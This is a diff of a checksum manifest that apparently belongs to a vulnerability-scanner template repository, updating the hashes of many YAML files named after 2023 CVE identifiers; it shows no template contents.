http/cves/2023/CVE-2023-27587.yaml:fbcf3d35ecfe4f4d8d5bf1bf1ca6a3139fc006f6 http/cves/2023/CVE-2023-27639.yaml:96c7fb109c3d31579f51e9d141b8558edf581a37 http/cves/2023/CVE-2023-27640.yaml:afb078a9eea67cd4dc96bbbf79568ed1a9e4535c -http/cves/2023/CVE-2023-2766.yaml:03f64dae62d768adf920de10d16dd723f54423d5 +http/cves/2023/CVE-2023-2766.yaml:24c190c745c0951e2c6db6672aa824d960149799 http/cves/2023/CVE-2023-2779.yaml:8f901cbf94797358ec2e4eae2c6cfdf8955af305 -http/cves/2023/CVE-2023-2780.yaml:1a64dc4ea8e06338d55fd7dba2eeabb9112f9c79 +http/cves/2023/CVE-2023-2780.yaml:bb7789bbd42db90ddc3fc599cf82b48751b640b7 http/cves/2023/CVE-2023-27922.yaml:f1c1540bd8ccf6e832690facd76287109c579359 -http/cves/2023/CVE-2023-2796.yaml:0bcdc19d6458a258c5b5deccc49339c3dbf05977 +http/cves/2023/CVE-2023-2796.yaml:bbe90b702fd73fa350d56644b7f72420e32a698f http/cves/2023/CVE-2023-28121.yaml:1e68ea14d35be9823d0510222f17fe122654dbdd http/cves/2023/CVE-2023-2813.yaml:62914ae5b1294dfee142150ca6062f968462b2c1 -http/cves/2023/CVE-2023-2822.yaml:c481c92f6bea32eb6c0474c4ffa5a718707f6000 -http/cves/2023/CVE-2023-2825.yaml:b702cd6f298c7796185e5fd16f4ced74058f32f7 -http/cves/2023/CVE-2023-28343.yaml:4d59ebf268f1fb54c1477ef63a304ee54f042b3a -http/cves/2023/CVE-2023-28432.yaml:3e9e2ad4603086df6f79959ee2572db613ec7400 -http/cves/2023/CVE-2023-28662.yaml:01509b7a219ce2a89c841c7e25de8660d0523fb6 +http/cves/2023/CVE-2023-2822.yaml:832b20338fa90959828ef3e67d5e817cd557a8aa +http/cves/2023/CVE-2023-2825.yaml:92feef41f6a25642c5215adcb38592b71c0462c9 +http/cves/2023/CVE-2023-28343.yaml:0252ea544fae8e4c4601f1ec39ab3d55115cba0f +http/cves/2023/CVE-2023-28432.yaml:55e5c982b19f567942ceb8ab4ac57446750405c9 +http/cves/2023/CVE-2023-28662.yaml:479bac6a27b092d0cae76337fbd93fc6dff1e096 http/cves/2023/CVE-2023-28665.yaml:c7ea34160278c858993ca4e151493a66c041e685 http/cves/2023/CVE-2023-29084.yaml:7335430074b2cdc90b92637fcf2145c3a2cdbb5a -http/cves/2023/CVE-2023-29298.yaml:0d8c3e1b11256211afa0f55cc2e1ac78ca964e2a -http/cves/2023/CVE-2023-29300.yaml:8106e12ee50960d5c091a797231abb678a43da33 -http/cves/2023/CVE-2023-29357.yaml:81423aef6740daa580d36ccc1d75f67150447d74 +http/cves/2023/CVE-2023-29298.yaml:fc59b893b6d31feebb375289accdccc041d75ac9 +http/cves/2023/CVE-2023-29300.yaml:92d57be27eb447fc6bd0912c30df002d7407a300 +http/cves/2023/CVE-2023-29357.yaml:0ab57ac3d6597a932b316bc1dfdb6dded4854294 http/cves/2023/CVE-2023-29439.yaml:6b4d13d29a6d82c006a51c21b21e1a5b65a5355c -http/cves/2023/CVE-2023-2948.yaml:a87d9899c2e83a651c7e72bbc24189edbdad1dee -http/cves/2023/CVE-2023-29489.yaml:e4c789babd6b97c69b427a5faa511bb10c04cdc6 -http/cves/2023/CVE-2023-2949.yaml:6cff7a4b409c4b4276e16c55363fbe2b4a44b651 +http/cves/2023/CVE-2023-2948.yaml:cca097d683e10aa4ad2b35c472a2cdb50272c44c +http/cves/2023/CVE-2023-29489.yaml:4f462e0b89b99c9d7023f0387258adafe22916ac +http/cves/2023/CVE-2023-2949.yaml:e6f53c4fb713b08bb1a0baf722ed01eecbf5b443 http/cves/2023/CVE-2023-29622.yaml:e073cdd1cecc1c12f4c15d92cd4b254f931b8717 http/cves/2023/CVE-2023-29623.yaml:45672ad306c134cd72076467059d7986e9967728 http/cves/2023/CVE-2023-2982.yaml:94f463ab73d722e5b527f6d3a9300e93167a364c -http/cves/2023/CVE-2023-29827.yaml:e42d979979986a9067745947d2d70d977c78f6ec +http/cves/2023/CVE-2023-29827.yaml:ed1ed567978feafa3e17c2a15996c18f9433830a http/cves/2023/CVE-2023-29887.yaml:e57348bffc401dde8d1d8fdfef061d1adac97095 -http/cves/2023/CVE-2023-29919.yaml:0b70235fb4eb213125ad3199044a4a74cdb79a5d -http/cves/2023/CVE-2023-29922.yaml:63c166c7203b9d85a78a01e818c41bcfc594e264 -http/cves/2023/CVE-2023-29923.yaml:ec0ee9f3b83c63d0f2992ad8cf78388d3b7cef78 +http/cves/2023/CVE-2023-29919.yaml:34291763789a69872c2b44b1ac40273ca897df0f +http/cves/2023/CVE-2023-29922.yaml:f0da9a62d02badbf7ac6b2ba807c94a38d666388 +http/cves/2023/CVE-2023-29923.yaml:cc106f6716a44a5aeca4a0abedc26408543c85b6 http/cves/2023/CVE-2023-30013.yaml:a7e4c7bc35c13f4d515cd586604b091640fe0594 -http/cves/2023/CVE-2023-30019.yaml:84e2dc2f76b1b01af25de0a200012771e84719da -http/cves/2023/CVE-2023-30150.yaml:43ba16e6462e92dbd5cbbe87fd05a916a9471791 +http/cves/2023/CVE-2023-30019.yaml:717d5bc6c8b2c31bfc2edd5c68bf2052492faaa8 +http/cves/2023/CVE-2023-30150.yaml:1953c3b4cbac3dec6f2f5184d7e112d387311614 http/cves/2023/CVE-2023-30210.yaml:5813ad5f81384f32da9b1376920592d190809922 http/cves/2023/CVE-2023-30212.yaml:e78558d9584338de17429906728f353dca4265ac http/cves/2023/CVE-2023-30256.yaml:21511c5e34cd98222ff485ca650f32c54ea3464d http/cves/2023/CVE-2023-30258.yaml:23dba33b4278040835f2427ff06c4cab132b3625 -http/cves/2023/CVE-2023-30534.yaml:b8366d03a08910ff684ee21057971613ca639183 +http/cves/2023/CVE-2023-30534.yaml:bce02358f392d2ede744df019b9c54bd5fffe9c3 http/cves/2023/CVE-2023-30625.yaml:5cdf3a74958ba59dc965b31f8d53010dd466ab95 -http/cves/2023/CVE-2023-3077.yaml:6bce7caa88a87f9c028881a6c2b363b0e35e6033 +http/cves/2023/CVE-2023-3077.yaml:cebbef9ab34764a6f193803c5f20aa535599cc56 http/cves/2023/CVE-2023-30777.yaml:2ec94a35275ee1271b6d0162b11c66c4325d8c33 http/cves/2023/CVE-2023-30868.yaml:7be43ec76fe6720e2d580becb0a56a9dc9064584 -http/cves/2023/CVE-2023-30943.yaml:693ebbefbb87853945cf05a78bc7ea2c0266995f -http/cves/2023/CVE-2023-31059.yaml:0c1b2b2f49e65ea3cbdcffcf64101af66b4112c0 -http/cves/2023/CVE-2023-31446.yaml:ebcd37a2816b4e0f0563848e91470795cd128bca +http/cves/2023/CVE-2023-30943.yaml:8a721fd678d41f3c5366dbdfcaac7fc3479f881c +http/cves/2023/CVE-2023-31059.yaml:ce8e595c554e7f91bb6e4ed339d987e571ffb947 +http/cves/2023/CVE-2023-31446.yaml:5accf9db37b634e8c8bcc2cd58586c8e0df71827 http/cves/2023/CVE-2023-31465.yaml:34cb2d553d530d7ad867cf82d889cba8c6153019 http/cves/2023/CVE-2023-31548.yaml:0f5f5182e5679b2d22cc503cd577b487ef7fe72d -http/cves/2023/CVE-2023-32077.yaml:bb6e60dd80a7c447b3a928845e2da538ae5aa08f +http/cves/2023/CVE-2023-32077.yaml:4fd13fb1ff9440e463e7d615d2f1ba70395821b9 http/cves/2023/CVE-2023-32117.yaml:46d14910cd14a3227dec95d78a2dc4262eba249b -http/cves/2023/CVE-2023-3219.yaml:341ec2eb90f8e20dfc82fc4b9777cd0030203c24 -http/cves/2023/CVE-2023-32235.yaml:a2c673aa312cb965d8a2c54adb909d45ea68a6ae +http/cves/2023/CVE-2023-3219.yaml:245f94f5a5a80ebd7cd5912e7849ad425cfcc8cb +http/cves/2023/CVE-2023-32235.yaml:c356c257b6d36c86dfb867f35d8ac3838fe299f3 http/cves/2023/CVE-2023-32243.yaml:12f4b4530ce4e76db0f256859ab890a9146307a2 -http/cves/2023/CVE-2023-32315.yaml:290e3b9bded90f77d9353041ba08d1616c1a4c60 +http/cves/2023/CVE-2023-32315.yaml:d477bab5a4cf364e864e99136376d0289a3784f0 http/cves/2023/CVE-2023-32563.yaml:44cd044910d9126b3895a2b9b810c7244c6b3899 http/cves/2023/CVE-2023-33338.yaml:1fb9344bc45d0ca490046cd0c948e5d1cf7974c9 http/cves/2023/CVE-2023-33405.yaml:128e1bcd0957fd5f4f048951ed46ca5ffe253a17 @@ -3054,276 +3054,276 @@ http/cves/2023/CVE-2023-3345.yaml:aabe8c491d1bea611b75c123b469b4c968571fa9 http/cves/2023/CVE-2023-33510.yaml:6db13769fa328f1cf80d6f5fb6adcdc9b8f1f53a http/cves/2023/CVE-2023-33568.yaml:785724178bb0f9cbb97d985c085d3d038efa75e9 http/cves/2023/CVE-2023-33584.yaml:77d714a7b592d8ba4975902502a902e91567dd97 -http/cves/2023/CVE-2023-33629.yaml:5307e5ffcf6f60f74365f76845414fc230e65e06 -http/cves/2023/CVE-2023-3368.yaml:e6a3271d3e7d7d88f9bfc9e6783e2462c42720b8 -http/cves/2023/CVE-2023-33831.yaml:36ea29ae8fadc2b9d98a2a8ca25dce2643129a32 +http/cves/2023/CVE-2023-33629.yaml:50b5034e3cc19561694c3aa213d4c0d53013b6cf +http/cves/2023/CVE-2023-3368.yaml:a8ff1548e219ee4de8587c1b1f37207efcdbb22d +http/cves/2023/CVE-2023-33831.yaml:e6d20c47f0fdd4c0d5fdfc162920edfa3a997ff4 http/cves/2023/CVE-2023-34020.yaml:8099d3e12f8a10e2d96d8bd1dc9161f04f821fb1 http/cves/2023/CVE-2023-34124.yaml:73042d74ae02e14a69bbc74952d41b3dc4aacc5e -http/cves/2023/CVE-2023-34192.yaml:107b59c3d3114f3bbeba99376c0ba323ace09c74 +http/cves/2023/CVE-2023-34192.yaml:d0455d9800bb265d0a14eba0bacef50a7d87a37e http/cves/2023/CVE-2023-34259.yaml:29e00e6317898a17f5c645a1badf181d0b0644f9 http/cves/2023/CVE-2023-34362.yaml:d477a1c3b81d3f95ec32840f9220c43d5de0ca13 -http/cves/2023/CVE-2023-34537.yaml:d476a69f826746cf1b020256469c34bd08b7b2ff -http/cves/2023/CVE-2023-34598.yaml:3d226a8e23d34e79c5d6d03db5b5c454b6cec29e -http/cves/2023/CVE-2023-34599.yaml:e455956e14f07f6991ed9c2439e8e92bbd602fc7 +http/cves/2023/CVE-2023-34537.yaml:0a82a06ab2f05e35b4cb238baff31f915ca7a864 +http/cves/2023/CVE-2023-34598.yaml:0b38abd88b3fc2ac7790d931685f45cb92433619 +http/cves/2023/CVE-2023-34599.yaml:0d749847fc42f3fc2a879d43fa3beecbd43b6091 http/cves/2023/CVE-2023-3460.yaml:2ba192fea89458954299c6b16ad3558abc8cc29a http/cves/2023/CVE-2023-34659.yaml:a165041e2b2c2e808d2ad5e955340a29696b62cb -http/cves/2023/CVE-2023-34751.yaml:771e6e2070ff90e345dc5347ac0dddfbd8d6127a -http/cves/2023/CVE-2023-34752.yaml:190a8c6b96e168d948b386c4cdab5e3059bbb8ff -http/cves/2023/CVE-2023-34753.yaml:93a73c917c60477016e6f248c4fd1a8642e70652 -http/cves/2023/CVE-2023-34755.yaml:f626d9064a3ae1ca3892d789a7c735a18d37c5a2 -http/cves/2023/CVE-2023-34756.yaml:82ebb563518c790f78d002dc611aa2058a26bb8d -http/cves/2023/CVE-2023-3479.yaml:afd42ba78d32587d4ab6372f9dad24ccda8746fa -http/cves/2023/CVE-2023-34843.yaml:65ea119c92f7411ba92801aa9b0dd5261ebf3827 -http/cves/2023/CVE-2023-34960.yaml:29d7f7058e868d72f8ce75c13d5b8b9196ff87fd -http/cves/2023/CVE-2023-34993.yaml:7faee4b95781596bd863f070f874ab096d09a810 -http/cves/2023/CVE-2023-35078.yaml:10ea41d33d4822f6fbc45d42b22dbf409032dfe3 -http/cves/2023/CVE-2023-35082.yaml:007dba2dd1296ea62724eb9a360fb510f589f605 -http/cves/2023/CVE-2023-35158.yaml:ab30d159f23b2ff3d989648944df251723c797d1 -http/cves/2023/CVE-2023-35162.yaml:afec600a829e803d9338c1aa19c972f16fad3fcd -http/cves/2023/CVE-2023-35813.yaml:9496ccf96c40cd3d58e7b7c573afeec35b932cb8 +http/cves/2023/CVE-2023-34751.yaml:c7ade34613bb0f06a616df8bbd0872e36d01843f +http/cves/2023/CVE-2023-34752.yaml:3d8c689180646565263c37930c73e2fc928ad52a +http/cves/2023/CVE-2023-34753.yaml:d2e51c1cbde33bdd5ac0621fde12b00d4ee4535c +http/cves/2023/CVE-2023-34755.yaml:d2312cced14cdc6863cea38517d0e3ccffa82d04 +http/cves/2023/CVE-2023-34756.yaml:1a4b15b7d48db2873ab2a3025c6e3eedffe0a005 +http/cves/2023/CVE-2023-3479.yaml:afc9997aba1f80f49a5d4cc9091de129be686a9c +http/cves/2023/CVE-2023-34843.yaml:402a7cd51d6553c404753eab05b0fc48649f9df9 +http/cves/2023/CVE-2023-34960.yaml:4e27c9bf1526aee4e168645550f2a85595b7df7a +http/cves/2023/CVE-2023-34993.yaml:8b4deeb45e70bb7dca9012a7fceb9e954fe1f867 +http/cves/2023/CVE-2023-35078.yaml:4986f8899e309eabfe7de47ac607fc17bc6e2306 +http/cves/2023/CVE-2023-35082.yaml:37ad71a404ca250f882e69f45503631e001653a2 +http/cves/2023/CVE-2023-35158.yaml:76d09942bb434d541e43eb224218c181af2a2f1f +http/cves/2023/CVE-2023-35162.yaml:b3c53552dcd6e3ef5ee198684f10ef0eec25f283 +http/cves/2023/CVE-2023-35813.yaml:071b2cdd7e888724f69f9772dafccd2fd315b143 http/cves/2023/CVE-2023-35843.yaml:fff3bc3dfbc836e0287b00ec362b9c5dda57a0a0 -http/cves/2023/CVE-2023-35844.yaml:272deae9e942a45cb59cb92eba084a11609bcb54 -http/cves/2023/CVE-2023-35885.yaml:cbc8ce10dd3689589cd4cf87144661e3e07d0a26 -http/cves/2023/CVE-2023-36144.yaml:212833d9ee78812611c3051797c0c6cd7e2b320e -http/cves/2023/CVE-2023-36284.yaml:36df643eb319f4999c8a7e450f4eb0e642d71aca +http/cves/2023/CVE-2023-35844.yaml:362b88178a6958a161fe8498be0caf3694119e36 +http/cves/2023/CVE-2023-35885.yaml:9d072bf2597d38fb0798e00bedfd76c38896d5a3 +http/cves/2023/CVE-2023-36144.yaml:d64d5631ea5ace897b3d1a2ed53e67a413b4884c +http/cves/2023/CVE-2023-36284.yaml:73b7811f12b0141d7c70db5af7cdb072b4e6c514 http/cves/2023/CVE-2023-36287.yaml:7f3341d0aa2cfaf19f8b259f6d6e9b3667aef2b5 http/cves/2023/CVE-2023-36289.yaml:4626b6dbf62ee313dfa3e667ad3f6e8ea8cb1c01 http/cves/2023/CVE-2023-36306.yaml:674f574793a5920dcb55fff45751621aad280b71 http/cves/2023/CVE-2023-36346.yaml:d18a4a45752c1d26dae308c33515cdc9ff7536b3 -http/cves/2023/CVE-2023-36347.yaml:38c958192e62fb572acc05c1bf7a539648a7b39b +http/cves/2023/CVE-2023-36347.yaml:2334ebf2ae4e441190c46110ac57c6c900b9a123 http/cves/2023/CVE-2023-36844.yaml:2f342d055540f1bb5d66ce79e0732a807922a919 -http/cves/2023/CVE-2023-36845.yaml:dd17d8edfbb7086c841fa29ec85ad711a00d4f96 +http/cves/2023/CVE-2023-36845.yaml:e03b7af2eb69af9f19e542fb25f8aecf957523c2 http/cves/2023/CVE-2023-36934.yaml:00fd5e39f91d83c208f7389a8af2c81cfdbd3e28 http/cves/2023/CVE-2023-3710.yaml:21a07e78c7d194842b8698d5f1a63e599f6a5250 -http/cves/2023/CVE-2023-37265.yaml:75152f0de5ea21c18bddb988a599fb0bd2af3098 -http/cves/2023/CVE-2023-37266.yaml:0cb18e812cda302d7b407a21595c40f81801afcf -http/cves/2023/CVE-2023-37270.yaml:be5e33cb570a415bb06023d9a3364b4e15bbfb78 -http/cves/2023/CVE-2023-37462.yaml:d18231ebb4f26962733dc33f60b7d8fafa939a80 +http/cves/2023/CVE-2023-37265.yaml:27abf5257b18a51d58eefec42854b952d334c0cf +http/cves/2023/CVE-2023-37266.yaml:7a3b152082cba21a51a3d98e3dfeda85ae67af6c +http/cves/2023/CVE-2023-37270.yaml:4f72f37dd9f3d8aa5dc73aa39884de681637226e +http/cves/2023/CVE-2023-37462.yaml:6b1f3970c1dc620fcedbcc081ecce0f3328b4e1f http/cves/2023/CVE-2023-37474.yaml:a6565d9a008a046e497384b2e3c54f2665ab21ce -http/cves/2023/CVE-2023-37580.yaml:70546873118d99565fd3a80de7f37494f23b8d63 +http/cves/2023/CVE-2023-37580.yaml:d81689caa2503f8ddaa833303e77e7d22e16d4d0 http/cves/2023/CVE-2023-37629.yaml:6b9aba73f2319467150cfdfb282cfb95d271174b -http/cves/2023/CVE-2023-3765.yaml:398deccf2838195156e67661734ad15466b068ce -http/cves/2023/CVE-2023-37679.yaml:44568429ee3e5c4de89120aaeeb8189bedf942b6 -http/cves/2023/CVE-2023-37728.yaml:b02bc1edba14ba4fa1f6c09a7e756a392f4e87c7 +http/cves/2023/CVE-2023-3765.yaml:76901ccd6f1bd5832e4e665fa7253eed60353a99 +http/cves/2023/CVE-2023-37679.yaml:3fd1560c8134ad5beee7f4c91164a5c38c28dbc8 +http/cves/2023/CVE-2023-37728.yaml:00598b29b4b89548b3276da06fbb24bd84c3a748 http/cves/2023/CVE-2023-37979.yaml:3542eab145a3bbe02375368006db5afcbb8c76ca -http/cves/2023/CVE-2023-38035.yaml:07e2c8f4934f0e81810188eb7838aa97beb5e1d3 -http/cves/2023/CVE-2023-38203.yaml:baaa26d2525ea4decf0173c398b041abaa079acc -http/cves/2023/CVE-2023-38205.yaml:c8aca2dcad231983d2f466e7c5193dee8ad6e9b3 -http/cves/2023/CVE-2023-3836.yaml:78cf2110f420c249091f69341cc66e289a6f51d0 +http/cves/2023/CVE-2023-38035.yaml:7e13653ba8b1089d2977bcd24d92a81f5d7e52ae +http/cves/2023/CVE-2023-38203.yaml:16b0b5592d81b145e4e8b1e4bb06bd3e576a2bd6 +http/cves/2023/CVE-2023-38205.yaml:e5782f68bf9504ca476f12a4ee99b0ce2f78d5aa +http/cves/2023/CVE-2023-3836.yaml:4fe6de4aaf6582ae8ad412a8f5c7c1d99765a416 http/cves/2023/CVE-2023-3843.yaml:e8aeab54aa508fc232b867618cdb37eaa7d9061e -http/cves/2023/CVE-2023-38433.yaml:6a80078eb3154856a386f9f4a88af0326cb45d62 -http/cves/2023/CVE-2023-3844.yaml:da12e5b14e3952041233defd69646050a3110cc4 +http/cves/2023/CVE-2023-38433.yaml:35084590ff5bf40afc49729848632a15e07ba284 +http/cves/2023/CVE-2023-3844.yaml:7441bc63203b72a00ca427f71013ee3534691d72 http/cves/2023/CVE-2023-3845.yaml:ce7fcd2beaf4569029a2858d37901b8cf459d940 http/cves/2023/CVE-2023-3846.yaml:4ed1668afe32b491fdc55b828e4a5611c0967f44 http/cves/2023/CVE-2023-3847.yaml:60407e2940cf8f721eb6f942c68ee24d68185a34 http/cves/2023/CVE-2023-3848.yaml:0dfa9f82d648a6f7c421af52421bded8f1f5bb6d http/cves/2023/CVE-2023-3849.yaml:8d921cdb62c336eadc8abebe7947cad3ec493b27 -http/cves/2023/CVE-2023-38501.yaml:ee88744cf62b1b968bfc451f537d9713e0b16dd9 -http/cves/2023/CVE-2023-38646.yaml:becb18fa384f8abb258c43e4c6473e9514fdd640 -http/cves/2023/CVE-2023-38964.yaml:7a989bd0f3aaa9c8f29516966ce9f47b8b9de548 -http/cves/2023/CVE-2023-39002.yaml:232e8fe2d23f36bd86981d0d1ebe2457ffe05e0b -http/cves/2023/CVE-2023-39026.yaml:4e6718ad951b36de10ede3280f0e7d4a595c0ca6 -http/cves/2023/CVE-2023-39108.yaml:e6b8de38d8e323e1db1abcd35909a66798434e10 -http/cves/2023/CVE-2023-39109.yaml:af99810bed59f612da7af10496b871bc25301f0e -http/cves/2023/CVE-2023-39110.yaml:2cd33ddf979c5f9ea4a067467a52259399157964 +http/cves/2023/CVE-2023-38501.yaml:b955e21d383121ef454fe0ce61bd2495f20d1ecb +http/cves/2023/CVE-2023-38646.yaml:bbbf58e66f171b4ef49d9f6a27e31909669ec53c +http/cves/2023/CVE-2023-38964.yaml:e7352ba1f581e6e3c8020d9228c2cd3c4059c4a6 +http/cves/2023/CVE-2023-39002.yaml:3f62cafeb7ee395669fb7a16d21b66999002e45f +http/cves/2023/CVE-2023-39026.yaml:2f9e3a69a751f2494b5aa2386162bda0b578f368 +http/cves/2023/CVE-2023-39108.yaml:fd4bc57666b7301f61d40738fc013c482c5d0fc4 +http/cves/2023/CVE-2023-39109.yaml:7f279748e20452f694f8fe67a79d54433508fb57 +http/cves/2023/CVE-2023-39110.yaml:af3c1f8c484e0f0e2216a68856676e2f9b7d3eea http/cves/2023/CVE-2023-39120.yaml:fe50f8e80ac67803942ed0b7fd0204e8f1fadbfc -http/cves/2023/CVE-2023-39141.yaml:00f30e0b61c4d370319c440131de1a66a204d542 -http/cves/2023/CVE-2023-39143.yaml:3cbe8e2370dda48e8ae904c135c1c5ebe4352781 +http/cves/2023/CVE-2023-39141.yaml:5c097eab47126884038a33c190ddfc7297c39d52 +http/cves/2023/CVE-2023-39143.yaml:91450c9ec6eddea14476f04d97048014420cbafb http/cves/2023/CVE-2023-3936.yaml:86f325fd48ca47e7f4cdfe3581027bc2514c4f12 -http/cves/2023/CVE-2023-39361.yaml:251196ba127c4cce3b9a743255fcd3e8dd6b72b4 -http/cves/2023/CVE-2023-39598.yaml:e45cc659e0145f32c22e647eb9aa760d80483933 -http/cves/2023/CVE-2023-39600.yaml:05a96384c47d1663281136e1ebd853dca39f6e5b -http/cves/2023/CVE-2023-39676.yaml:6f3625a79f9d80b5581225efbb1999b18cb15e63 -http/cves/2023/CVE-2023-39677.yaml:a0c8dbbb56fc6ae2be2c499bb5819697a20d3281 -http/cves/2023/CVE-2023-39700.yaml:66065775e568c16ac1384410c098e745aa2d5aa6 +http/cves/2023/CVE-2023-39361.yaml:4c151037ccf599d9d2d4cb870aaf0fd9c4af8037 +http/cves/2023/CVE-2023-39598.yaml:08416090607df77a064737cf04fbee229e009b57 +http/cves/2023/CVE-2023-39600.yaml:7bc52c9f178223c128a174a171353c694429c88e +http/cves/2023/CVE-2023-39676.yaml:85436c487f3535f724b8b552987b8564b715a2a4 +http/cves/2023/CVE-2023-39677.yaml:379d594ca8bbfea196d292c1856da7eae11b3332 +http/cves/2023/CVE-2023-39700.yaml:abd644de09232548601e5d2d693d4c054e1b42a0 http/cves/2023/CVE-2023-39796.yaml:a729bba89e9885a729b5fd594b78afc93de872b1 http/cves/2023/CVE-2023-40208.yaml:3bd72bed6969fb8149de3c31b7909d9c88799d1f http/cves/2023/CVE-2023-40355.yaml:7761faee9b0236c926e300d32db3a9508227204d -http/cves/2023/CVE-2023-40779.yaml:f6c3ca4ba9db46609d07ac3cc0e28b1e05b151c1 +http/cves/2023/CVE-2023-40779.yaml:44138c89024a59d0b0105341177b8d5718ce132f http/cves/2023/CVE-2023-4110.yaml:83f4284a809037eb7d4ef4b7b3f11deadb3440af http/cves/2023/CVE-2023-41109.yaml:c8149b1952ea7315ce40e355fd02b165c46cbad8 http/cves/2023/CVE-2023-4111.yaml:437dd6aa165710e549632a8b1a48ba5bdfed9c4a -http/cves/2023/CVE-2023-4112.yaml:a46d18b6e3c01cfa5bc4a28b681e90b12e317399 +http/cves/2023/CVE-2023-4112.yaml:6cda0d91374ab0397322e67d8caadb5e380c25c2 http/cves/2023/CVE-2023-4113.yaml:9718137c9767d86dce907f001a2e138fb4d7841e http/cves/2023/CVE-2023-4114.yaml:5ba02fe30cf771bc4115635a3984bebc3457118b http/cves/2023/CVE-2023-4115.yaml:b0d90d4bf5bb9dcac3b1b52d45aaa0f2d586613e -http/cves/2023/CVE-2023-4116.yaml:b481df73bbe4c022070f9320f387d04d3694ab93 -http/cves/2023/CVE-2023-41265.yaml:93db4b73723e897472002fd29875bf430f5e48d0 -http/cves/2023/CVE-2023-41266.yaml:4dfd0f0dfa477b137fc2e259ced3fc534a62ef7c +http/cves/2023/CVE-2023-4116.yaml:a8369bf0db914cc8e77621275a645ee1927cfd49 +http/cves/2023/CVE-2023-41265.yaml:690ef3967f4a383b6de2fe9a099db2e10df9b132 +http/cves/2023/CVE-2023-41266.yaml:f7a50a86eec6072d1c39c51f8ae0237d9de19b1e http/cves/2023/CVE-2023-4148.yaml:dd568e6c72619e2d55cc4ef764fc5944636c7946 http/cves/2023/CVE-2023-41538.yaml:4e735c71f54ac27baa8987be74e444bbe0f9775c http/cves/2023/CVE-2023-41642.yaml:fbee72e0d62b6fa6c43e1bb34c5800412ac27d0e http/cves/2023/CVE-2023-4168.yaml:0006757cc3858b565e930fb9235b2269e59b1d64 http/cves/2023/CVE-2023-4169.yaml:639f6a6b20b2c228fb24159376e31c38682b5364 -http/cves/2023/CVE-2023-4173.yaml:f206e31220ca3c55c166a77131fffa69d8316f9d -http/cves/2023/CVE-2023-4174.yaml:41026f595a36739b329b6c0771cfe51279c4df6d -http/cves/2023/CVE-2023-41763.yaml:4e6fdd838f1b664ca7b3bd019b865b593ba09ce3 -http/cves/2023/CVE-2023-41892.yaml:6089588092525d265ca1d42cbc00f6c90fcb4a49 -http/cves/2023/CVE-2023-42343.yaml:44cdefd4a8d279a4c3c7f849d4ab93440f245d0c +http/cves/2023/CVE-2023-4173.yaml:7a186ce21f79cc2aaf602f20096b3da265eea94e +http/cves/2023/CVE-2023-4174.yaml:6d9b3231d2c766eb63eedeb04b924000b7999e4e +http/cves/2023/CVE-2023-41763.yaml:b428682d889984946edc1203e1c240b9c5ae4137 +http/cves/2023/CVE-2023-41892.yaml:1e501e0ef2d2102d6c865fe4547501649ec2164c +http/cves/2023/CVE-2023-42343.yaml:69a0589c7e96b3ae72a73dc5610cd79f60246440 http/cves/2023/CVE-2023-42344.yaml:674f69182dcf67d59a4a19c9adfc0b2e92fe5645 -http/cves/2023/CVE-2023-42442.yaml:fc5b468630f7ca32691c2cb472d8ef56c72fb258 -http/cves/2023/CVE-2023-42793.yaml:a8dc601ce6a5022c5b2c6ddf38fb1c10bb89caf7 +http/cves/2023/CVE-2023-42442.yaml:5ea1d0998ecaa52c2608185126326ef0ea979314 +http/cves/2023/CVE-2023-42793.yaml:cf9e52f051ab7aa69dd36cfabf42f737bee17097 http/cves/2023/CVE-2023-43177.yaml:0605e78cef73e2c3e0ce29c115e4bf8028a16c7a http/cves/2023/CVE-2023-43187.yaml:dbb0d7b9be18eb24fd7858deccbdd2824fb2f204 -http/cves/2023/CVE-2023-43208.yaml:9ec85a78d8c6f69dcdbd4751b1d6ed2ce6a0deb5 +http/cves/2023/CVE-2023-43208.yaml:462628870cee32dc0dccd7ed2d329f54ac90d917 http/cves/2023/CVE-2023-43261.yaml:4c534b1a5dd5916c25664920de4051ffa1310bf1 http/cves/2023/CVE-2023-43325.yaml:cad3358ef79bdf761c1bbb77c839e9af325f506f http/cves/2023/CVE-2023-43326.yaml:f117aa600d3815d4394d93563495b9a183a6b76d -http/cves/2023/CVE-2023-43374.yaml:dc8b1b9c649558fa3bfa467f7a2b12d1a0a090b6 -http/cves/2023/CVE-2023-43795.yaml:6f5afe9c1473d148781005d35b3943a39aa4ab4b +http/cves/2023/CVE-2023-43374.yaml:f65d0fd722479f51ef71a6ea57cdba8cc2e9b4a9 +http/cves/2023/CVE-2023-43795.yaml:36d3e9de4b3f54d3976afca31c54f6bf5f288b53 http/cves/2023/CVE-2023-4415.yaml:17cc5b909d851380cf62dcece5db812a7e1ea68a -http/cves/2023/CVE-2023-44352.yaml:3ba0d458af2298128a4107dadb58efda025f8a53 -http/cves/2023/CVE-2023-44353.yaml:3b7cb97393782c7aad88aef741820cb4922dd584 -http/cves/2023/CVE-2023-4451.yaml:7013c4a2ac8b03f7fef1cd63fad2cd5e534315ed -http/cves/2023/CVE-2023-44812.yaml:35f649b3ec2a6ec2839baef272bd27e164f9b43a -http/cves/2023/CVE-2023-44813.yaml:db3d33cb6c9a1b50551c7553654f73a619665f79 -http/cves/2023/CVE-2023-4521.yaml:cc05887f49c8f90706c29bf9bedff649f9142ccd -http/cves/2023/CVE-2023-45375.yaml:83937401fd3fb72656256cb940869db251cfdb64 -http/cves/2023/CVE-2023-4542.yaml:e920376a741cba1397a1452f2b2c1037fc523785 +http/cves/2023/CVE-2023-44352.yaml:aab520d12d287288efc9c45a67a0e196a444ff93 +http/cves/2023/CVE-2023-44353.yaml:147dd7796888db15383a9db3b463b1c564bde8cf +http/cves/2023/CVE-2023-4451.yaml:d5e665511b95b75eea8988c75f5427b4616e80c9 +http/cves/2023/CVE-2023-44812.yaml:11e5628cb888352e0dcd50839df33dc85fb2b58c +http/cves/2023/CVE-2023-44813.yaml:ba83815830ad498e3a1e78649d1ddc4a48612025 +http/cves/2023/CVE-2023-4521.yaml:bf7e36be57080136c6ecbbc5e1d1844a5df269ec +http/cves/2023/CVE-2023-45375.yaml:7279d79b85a43bff82cd0fdb9796ce516167493b +http/cves/2023/CVE-2023-4542.yaml:c0a79c6b0145c8d875e16d60d6a0fea2632dd99b http/cves/2023/CVE-2023-4547.yaml:f35005a0035fb0980139129649d73a6f577bbd66 http/cves/2023/CVE-2023-45542.yaml:137cadf0894adf5a9bbb7e447a9b7d4d2ca849e6 -http/cves/2023/CVE-2023-45671.yaml:e914b554522692fd1abea7bd7a249d6a4f1c0132 -http/cves/2023/CVE-2023-4568.yaml:1e8cfc4a8d5702a5983d694a51e520a3b0873abf 